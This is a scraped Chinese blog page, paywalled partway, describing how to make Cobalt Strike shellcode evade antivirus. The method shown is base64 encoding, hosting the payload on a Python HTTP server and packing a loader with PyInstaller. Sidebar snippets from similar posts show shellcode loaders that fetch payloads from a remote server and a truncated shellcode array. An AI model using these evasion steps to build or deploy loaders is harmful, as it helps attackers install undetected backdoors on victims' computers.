pyinstaller+cs生成免杀exe过杀毒软件

最新推荐文章于 2024-07-26 17:36:26 发布
最新推荐文章于 2024-07-26 17:36:26 发布
阅读量2.5k 收藏 18
点赞数 3
分类专栏: 文章 文章标签: pyinstaller python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AerYinan/article/details/112025474
版权

pyinstaller+cs生成免杀exe过杀毒软件

简介:

之前学习免杀都是使用Metasploit自带的编码进行,从未成功过。也使用过GitHub上别人提供的免杀方法,最近学习并实践发现绕过国内的杀毒软件貌似并不难,本文使用手工分析特征码,使用base64编码绕过杀毒软件静态分析。虽然使用的方法比较简单,但对实际做免杀及免杀研究还是有一定意义的。

项目工具 :

CobaltStrike(CS)
python
pyinstaller
windows7

通过cs免杀:

生成payload
在这里插入图片描述

生成C语言的payload

在这里插入图片描述
生成之后是一个payload.c的文件 把这个文件里面的unsigned char buf[] = 后面双引号里面的都复制一下 新创建一个文件夹(在这里我创建的是shellcode )在这个文件夹里面创建一个html网页(a.html) 把payload.c里面复制的放在这个a.html网页里面 在本文件夹通过python启动一个http服务
开启http服务

python -m http.server 8080

访问查看是否开启http服务 服务已经打开

#generate.py
import pickle
import base64
shellcode=
最低0.47元/天 解锁文章
Are一楠
关注
  • 3
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
PyQt5.6+pycharm配置以及pyinstaller生成exe(小白教程)
09-16
主要介绍了PyQt5.6+pycharm配置以及pyinstaller生成exe,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
CS结合python3混淆shellcode制作免杀脚本
m0_48108919的博客
03-19 7386
文章参考自:Cobalt Strike免杀操作 - 技术文章 - 90Sec 0x00基础知识 Cobalt Strike简介 Cobalt Strike是一款功能强大的渗透工具,集成了端口转发、提权、凭据导出、服务扫描、文件捆绑、木马生成,钓鱼等多种功能。Cobalt Strike作为一款协同工具,主要用于团队作战,能让多个攻击者同时连接到团体服务器上,共享攻击资源与目标信息和sessions。 Shellcode介绍 简单翻译 ' shell代码 ',是Payload的一种,由于其建立正向/反
payload免杀之msbuild利用
weixin_30883311的博客
09-19 335
0x00 前言 红队必备技巧免杀之一,现在主要是.net4.0下实现。待我过几天有空实现一下.net2.0。 0x01 免杀过程 利用cs生成c#的payload,如图所示: 将paypload内容填充到里面, <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer...
简单免杀绕过和利用上线的GoCS
2401_84488537的博客
06-03 1101
第一次编写插件和编写 js 文件,无疑是一次面向百度的编程,总体还是不错,学到了很多。遗憾的是 asp 并没有免杀,还希望会 asp 的师傅指导一下。这个版本很基础,很简单进行利用,所以只能在简单环境下利用,希望后面能加入更多的元素,让这个插件适应更多复杂环境。网络安全学习资源分享:给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
pyinstaller打包逆向分析,顺便免杀Windows Defender
crowsec
02-10 3393
本文使用了最基本的shellcode加载器免杀的方法,而且一起学习了pyinstaller打包exe的反编译方式,也顺便免杀了火绒、360、Windows Defender,当然从该文章发出来的那一刻起,可能免杀就不再有效了,不过,方法千千万,免杀没有那么难。
python打包的exe如何免杀_CS强化_python免杀
weixin_39947314的博客
11-26 672
CS作为主流红队工具,其在后渗透中的地位自不用说,功能强大,但如何让它活下去就成了个人发挥的内容,今天我们以python payload为例展开。payload生成通过cs自动生成我们python payload:值得一提的是360、电脑管家等均为对该payload报毒,倒是Windows Defender觉得事情没那么简单,显然不装杀毒软件的PC是最难搞的23333,因为它会默认开启Window...
免杀】木马免杀制作
网络安全从业者的学习笔记
03-25 1698
免杀就是指能够使病毒木马逃避杀毒软件检测的一种技术。总体来讲,免杀分为静态免杀和动态免杀,静态免杀基于特征值,而动态免杀则是基于行为。这里我们讲Cobalt Strike生成Python木马,免杀绕过火绒。
(记录向)Python反序列化免杀上线CS(并使用Shielden加密绕过360)
daxi0ng的博客
01-31 1710
1、首先cs生成一个64位的Python Payload 2、截取其中的Payload,并进行base64编码。 3、把这一串子base64放到VPS上。并开启web服务。 python3 -m http.server 7777 4、使用以下脚本。将Python Payload进行反序列化。 import pickle import base64 shellcode = """ import ctypes,urllib.request,codecs,base64
浅谈利用cs进行免杀的思路总结
goddemon
05-31 3934
思路① 利用c语言+veil实现免杀 #include "pch.h"//可以删除 #include <windows.h> #include <stdio.h> #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//不显示窗口 unsigned char shellcode[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\......";//即生成
CobaltStrike使用-第九篇-免杀
Love&Share
12-08 7146
本篇将会介绍CS payload免杀工具的使用 文章目录杀毒软件杀软常见扫描方式杀软扫描引擎常见免杀技术免杀工具使用HanzoInjectionInvoke-PSImagePython脚本封装Artifact KitVeil Evasion免杀插件 常规杀毒软件的目的就是发现已知病毒并中止删除它,而作为攻击者则需要对病毒文件进行免杀处理,从而使杀毒软件认为我们的文件是合法文件 杀毒软件 杀软常见扫描方式 扫描压缩包技术:即是对压缩包案和封装文件作分析检查的技术。 程序窜改防护:即是避免恶意程序借由删除杀.
利用python免杀cs shellcode
蚁景网安学院
02-13 2143
0x01 前言2019年,告别了coder的世界,告别了从前的生活。我决定暂时抛开金钱至上的价值体系,以一个Fucking loser的身份去寻找人生中的三大哲学问题,我是谁,我在哪儿,...
详解pyinstaller生成exe的闪退问题解决方案
09-16
然而,在使用PyInstaller生成EXE时,有时会出现程序闪退的问题,这通常是由于缺少依赖或者配置不当引起的。本文将详细讲解如何解决PyInstaller生成EXE后出现的闪退问题。 首先,如果在执行`pyinstaller project.py`...
Pyinstaller打包.py生成.exe的方法和报错总结
09-19
本文将详细介绍如何使用 PyInstaller 将 `.py` 文件打包成 `.exe`,并总结可能出现的常见错误及解决方法。 首先,确保已经正确安装了 PyInstaller。在命令行中输入 `pip install pyinstaller` 即可安装。...
Python学习+PySimpleGUI+Pyinstaller,制作Windows桌面exe,演示生成的小程序
03-13
Python学习+PySimpleGUI+Pyinstaller,制作Windows桌面exe,演示生成的小程序 Python学习+PySimpleGUI+Pyinstaller,制作Windows桌面exe,演示生成的小程序 Python学习+PySimpleGUI+Pyinstaller,制作Windows桌面exe...
全网最详细Gradio教程系列5——Gradio Client: python
最新发布
shao918516的博客
07-26 618
程序部署完成后,如何将Gradio App作为API访问使用呢,这就用到Gradio Client。本章讲解Gradio Client的三种使用方式:python、javascript和curl,受字数限制,所以分三篇博客发布。 使用Gradio Python Client非常易于将Gradio应用程序作为API使用,本节讲述gradio_client安装、如何连接Gradio应用程序、查看可用API及其使用方式、job及session等用法。 通过Gradio Python Cli
随机数种子的作用
帆的博客
07-23 1255
设置随机数种子(random seed)的目的是为了确保随机数生成器在每次运行时产生相同的随机数序列,从而保证实验结果的一致性。随机数种子通过初始化随机数生成器的内部状态,使得在相同的种子值下,随机数生成器每次调用时生成的序列是相同的。
安卓手机部署大模型实战
奇舞周刊
07-25 514
本文作者系360奇舞团前端开发工程师前言自ChatGPT发布以来,大语言模型(Large language model, LLM)就成了AI乃至整个计算机科学的话题中心。学术界,工业界围绕大语言模型本身及其应用展开了广泛的讨论,大量的新的实践层出不穷。由于LLM对计算资源的需求极大,有能力部署大语言模型的公司和实验室一般通过搭建集群,然后开放API或者网页demo的方式让用户可以使用模型。在人们纷...
Java实现拼图小游戏
Aishangyuwen的博客
07-22 1562
Java实现拼图小游戏
pyinstaller 怎么生成exe文件
04-14
您好,关于生成exe文件,您可以使用pyinstaller来实现。具体步骤如下: 1. 打开CMD或者终端,切换到python文件所在的目录下。 2. 安装pyinstaller:pip install pyinstaller,如果已经安装过则可以跳过这一步。 3. 执行以下命令:pyinstaller -F -w 文件名.py,其中-F参数是生成单一文件,-w参数是运行时不出现命令窗口。 4. 等待程序执行完成,生成exe文件在dist目录下。 希望能对您有所帮助!如果您有其他问题可以继续提问哦~
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值